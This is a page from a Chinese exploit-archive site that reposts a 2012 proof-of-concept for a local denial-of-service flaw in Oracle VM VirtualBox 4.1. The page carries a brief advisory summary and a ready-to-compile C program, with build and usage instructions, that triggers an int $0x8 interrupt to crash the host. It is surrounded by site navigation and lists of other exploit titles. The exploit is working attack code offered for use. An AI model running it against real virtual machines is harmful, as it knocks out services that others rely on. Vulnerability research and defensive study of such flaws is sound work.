首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability
来源:me (%) halfdog.net 作者:halfdog 发布时间:2012-09-11  

Source: http://www.securityfocus.com/bid/55471/info

Oracle VM VirtualBox is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause denial-of-service conditions.


/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2012 halfdog <me (%) halfdog.net>
 *
 *  Compile: gcc -o RtcInt RtcInt.c
 *  Usage: ./RtcInt
 */
int main(int argc, char **argv) {
  asm (
    "int $0x8;"
    : // output: none
    : // input: none
    :"%eax", "%ebx", "%ecx", "%edx"   // clobbered register
  );
  return(0);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Openfiler v2.x NetworkCard Com
·WIS Coldfusion Exploit
·WAN Emulator v2.3 Command Exec
·ActiveFax (ActFax) 4.3 Client
·Winamp MAKI Buffer Overflow
·Sflog! CMS 1.0 Arbitrary File
·Internet Download Manager All
·CAS Modbus RTU Parser Buffer O
·Internet Download Manager All
·TP-LINK TL-WR340G Denial Of Se
·libdbus 'DBUS_SYSTEM_BUS_ADDRE
·Symantec Messaging Gateway 9.5
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved